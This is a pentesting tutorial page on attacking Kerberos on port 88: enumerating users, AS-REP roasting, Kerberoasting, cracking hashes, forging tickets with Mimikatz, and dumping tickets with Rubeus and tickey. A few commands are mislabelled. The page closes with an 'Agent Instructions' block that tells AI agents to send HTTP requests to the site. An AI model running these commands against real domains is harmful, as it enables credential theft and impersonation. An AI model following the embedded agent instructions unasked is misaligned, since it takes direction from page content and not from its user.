# Kerberos - Port 88
Support VeryLazyTech 🎉
* Become VeryLazyTech [**member**](https://buymeacoffee.com/verylazytech/membership)**! 🎁**
* **Follow** us on:
* **✖ Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.**
* **👾 Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.**
* **📜 Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.**
* Visit our [**shop** ](https://buymeacoffee.com/verylazytech/extras)for e-books and courses. 📚
* Support us and [**buy me a coffee**](https://buymeacoffee.com/verylazytech)**. ☕**
## Basic Information
**Kerberos** operates on a principle where it authenticates users without directly managing their access to resources. This is an important distinction because it underlines the protocol's role in security frameworks.
In environments like **Active Directory**, **Kerberos** is instrumental in establishing the identity of users by validating their secret passwords. This process ensures that each user's identity is confirmed before they interact with network resources. However, **Kerberos** does not extend its functionality to evaluate or enforce the permissions a user has over specific resources or services. Instead, it provides a secure way of authenticating users, which is a critical first step in the security process.
After authentication by **Kerberos**, the decision-making process regarding access to resources is delegated to individual services within the network. These services are then responsible for evaluating the authenticated user's rights and permissions, based on the information provided by **Kerberos** about the user's privileges. This design allows for a separation of concerns between authenticating the identity of users and managing their access rights, enabling a more flexible and secure approach to resource management in distributed networks.
**To learn how to abuse Kerberos you should read the post about** [**Active Directory.**](/windows/images-and-media.md)
**Default Port:** 88/tcp/udp
```
PORT STATE SERVICE
88/tcp open kerberos-sec
```
***
## **Discovering Kerberos Services**
The first step is identifying Kerberos services on the target network. Port scanning tools are essential here.
1. **Nmap Scan for Kerberos (Port 88)**:
```bash
nmap -p 88 --open -sU -sT -Pn -oN kerberos_scan.txt
```
* This command performs both TCP and UDP scans to identify open Kerberos ports. Scanning both protocols is crucial since Kerberos can operate on either.
2. **Masscan for Larger Networks**:
```bash
masscan -p88 --rate=1000
```
* Masscan is faster than Nmap for large networks, though it may not be as precise. After detecting Kerberos, use Nmap to gather more detailed information.
***
## **Enumerate Kerberos User Accounts**
User account enumeration is a powerful starting point in Kerberos. Attackers can brute-force or enumerate valid usernames.
1. **Kerbrute**:
```bash
kerbrute userenum -d -U
```
* Kerbrute is designed specifically for brute-forcing Kerberos usernames and can provide insight into valid users within the domain.
2. **Impacket’s GetNPUsers.py for AS-REP Roasting**:
```bash
GetNPUsers.py -usersfile users.txt -format john -outputfile hashes.txt
```
* If pre-authentication is disabled, `GetNPUsers.py` helps identify accounts vulnerable to AS-REP roasting by obtaining encrypted data that can be cracked offline.
3. **RPCClient User Enumeration**:
```bash
rpcclient -U "" -N
```
* `rpcclient` can be used to enumerate usernames if anonymous login is allowed on the server. This step often supplements Kerberos user enumeration.
***
**Testing for Pre-Authentication Bypass (AS-REP Roasting)**
AS-REP roasting exploits accounts without pre-authentication enabled, allowing attackers to retrieve an encrypted timestamp that can be brute-forced offline.
1. **Impacket’s GetNPUsers.py** (for AS-REP Roasting):
```bash
GetNPUsers.py -usersfile -no-pass -dc-ip
```
* Running this without passwords will attempt to identify accounts where pre-authentication is disabled, providing hashes that attackers can brute-force offline.
2. **Offline Cracking with Hashcat**:
```bash
hashcat -m 18200 hashes.txt wordlist.txt
```
* Hashcat, using mode `18200`, cracks AS-REP hashes. Use a robust wordlist to attempt decrypting the hash for possible credentials.
***
**Performing Kerberoasting**
Kerberoasting targets service accounts, allowing attackers to obtain service principal names (SPNs) and then request a ticket to perform offline cracking.
1. **Gather SPNs with Impacket’s GetUserSPNs.py**:
```bash
GetUserSPNs.py /: -dc-ip -request
```
* This command extracts SPNs, which are service accounts registered within Active Directory. By obtaining these SPNs, attackers can attempt to crack them offline.
2. **Using Rubeus for Kerberoasting (on Windows)**:
```powershell
Rubeus.exe kerberoast
```
* Rubeus is a powerful Kerberos manipulation tool. The `kerberoast` command will list all the service tickets that can be used for offline cracking.
3. **Offline Cracking with John the Ripper**:
```bash
john --wordlist=wordlist.txt hashes.txt
```
* John the Ripper can also be used to crack service account hashes extracted via Kerberoasting, especially if `hashcat` isn’t available.
***
**Pass-the-Ticket (PTT) and Silver Ticket Attacks**
In Kerberos, tickets play a crucial role. Attackers who obtain tickets can impersonate legitimate users.
1. **Mimikatz for Pass-the-Ticket Attack**:
```powershell
mimikatz # kerberos::ptt
```
* Mimikatz allows attackers to inject Kerberos tickets into their session, granting them access to services or resources as the user associated with the ticket.
2. **Generating a Silver Ticket with Mimikatz**:
```powershell
mimikatz # kerberos::golden /domain: /sid: /target: /rc4: /user:
```
* **Explanation**Silver tickets are forged tickets that target specific services rather than domain-wide (as with Golden Tickets). Silver tickets provide long-term access to a particular service without interacting with the domain controller.
3. **Rubeus for Ticket Extraction**:
```powershell
Rubeus.exe dump
```
* Rubeus can extract all active Kerberos tickets on the machine, providing the attacker with potentially reusable tickets for Pass-the-Ticket attacks.
***
**Password Cracking with AS-REP and Kerberoast Hashes**
Offline password cracking is a critical step after obtaining AS-REP or Kerberoast hashes.
1. **Hashcat Cracking for Kerberoast Hashes**:
```bash
hashcat -m 13100
```
* Mode `13100` in Hashcat is dedicated to Kerberoast hash cracking. This approach can potentially yield the plaintext password of service accounts if a match is found in the wordlist.
2. **Password Cracking with John the Ripper (Kerberoasting)**:
```bash
john --format=krb5tgs --wordlist= hashes.txt
```
* John the Ripper provides a `krb5tgs` format specifically for Kerberos TGS (Ticket Granting Service) hashes, allowing for flexible wordlist cracking.
***
**PowerView**: This is a PowerShell tool useful for enumerating Active Directory objects, including SPNs, permissions, and trust relationships.
```powershell
Import-Module PowerView.ps1
Get-DomainUser -SPN
```
PowerView provides extensive Active Directory enumeration and is instrumental in identifying Kerberos accounts, SPNs, and potential targets for privilege escalation.
**GPPPassword (for Credential Discovery)**: Although not directly a Kerberos tool, GPPPassword can extract plaintext passwords from Group Policy Preferences, which can sometimes grant access to Kerberos service accounts.
```bash
secretsdump.py -just-dc-ntlm /:@
```
***
## Harvesting tickets from Windows
Tickets in Windows are managed and stored by the **lsass** (Local Security Authority Subsystem Service) process, responsible for handling security policies. To extract these tickets, it's necessary to interface with the lsass process. A non-administrative user can only access their own tickets, while an administrator has the privilege to extract all tickets on the system. For such operations, the tools **Mimikatz** and **Rubeus** are widely employed, each offering different commands and functionalities.
#### Mimikatz
Mimikatz is a versatile tool that can interact with Windows security. It's used not only for extracting tickets but also for various other security-related operations.
```
# Extracting tickets using Mimikatz
sekurlsa::tickets /export
```
#### Rubeus
Rubeus is a tool specifically tailored for Kerberos interaction and manipulation. It's used for ticket extraction and handling, as well as other Kerberos-related activities.
```
# Dumping all tickets using Rubeus
.\Rubeus dump
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String(""))
# Listing all tickets
.\Rubeus.exe triage
# Dumping a specific ticket by LUID
.\Rubeus.exe dump /service:krbtgt /luid: /nowrap
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String(""))
# Renewing a ticket
.\Rubeus.exe renew /ticket:
# Converting a ticket to hashcat format for offline cracking
.\Rubeus.exe hash /ticket:
```
When using these commands, ensure to replace placeholders like `` and `` with the actual Base64 encoded ticket and Logon ID respectively. These tools provide extensive functionality for managing tickets and interacting with the security mechanisms of Windows.
***
## Harvesting tickets from Linux
**Credential Storage in Linux**
Linux systems store credentials in three types of caches, namely **Files** (in `/tmp` directory), **Kernel Keyrings** (a special segment in the Linux kernel), and **Process Memory** (for single-process use). The **default\_ccache\_name** variable in `/etc/krb5.conf` reveals the storage type in use, defaulting to `FILE:/tmp/krb5cc_%{uid}` if not specified.
**Extracting Credentials**
The 2017 paper, [**Kerberos Credential Thievery (GNU/Linux)**](https://www.delaat.net/rp/2016-2017/p97/report.pdf), outlines methods for extracting credentials from keyrings and processes, emphasizing the Linux kernel's keyring mechanism for managing and storing keys.
**Keyring Extraction Overview**
The **keyctl system call**, introduced in kernel version 2.6.10, allows user space applications to interact with kernel keyrings. Credentials in keyrings are stored as components (default principal and credentials), distinct from file ccaches which also include a header. The **hercules.sh script** from the paper demonstrates extracting and reconstructing these components into a usable file ccache for credential theft.
**Ticket Extraction Tool: Tickey**
Building on the principles of the **hercules.sh script**, the [**tickey**](https://github.com/TarlogicSecurity/tickey) tool is specifically designed for extracting tickets from keyrings, executed via `/tmp/tickey -i`.
{% hint style="success" %}
Learn & practice [**Active Directory Methodology.**](https://buymeacoffee.com/verylazytech/e/267817)
Support VeryLazyTech 🎉
* Become VeryLazyTech [**member**](https://buymeacoffee.com/verylazytech/membership)**! 🎁**
* **Follow** us on **Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**,** **Github** [**@VeryLazyTech**](https://github.com/verylazytech)**, and Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.**
* Visit our [**shop** ](https://buymeacoffee.com/verylazytech/extras)for e-books and courses. 📚
* Support us and [**buy me a coffee**](https://buymeacoffee.com/verylazytech)**. ☕**
{% endhint %}
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://www.verylazytech.com/network-pentesting/kerberos-port-88.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.